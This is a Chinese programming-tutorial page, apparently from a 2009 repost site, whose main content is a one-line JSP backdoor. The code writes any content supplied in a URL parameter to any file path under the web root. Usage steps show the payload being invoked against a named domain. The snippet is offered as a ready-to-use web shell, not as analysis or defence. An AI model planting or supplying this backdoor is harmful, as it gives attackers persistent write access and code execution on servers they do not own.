当前位置: 首页 > 图文教程 > 网络编程 > JSP > JSP一句话后门

JSP
JSP语法(6)
JSP中的TagLib应用(3-1)
JSP中的TagLib应用(3-2)
JSP中的TagLib应用(4-1)
JSP语法(9)
JSP语法(12)
JSP中的TagLib应用(3-4)
JSP语法(10)
JSP语法(11)
JSP语法(8)
JSP语法(13)
JAVA/JSP学习系列之目录
JAVA/JSP学习系列之十三
JAVA/JSP学习系列之八
WebLogic的初步研究(1-3)
JSP由浅入深(9)
JSP由浅入深(4-1)
JSP由浅入深(1)
JSP由浅入深(4-2)
JSP由浅入深(6)

JSP一句话后门


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 74 ::
收藏到网摘: n/a

<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

使用方法:
提交url!
jsp?f=1.txt" target="_blank">http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=HelloWorld
然后:http://www.whitehouse.net.cn/1.txt 就出来了 内容为 HelloWorld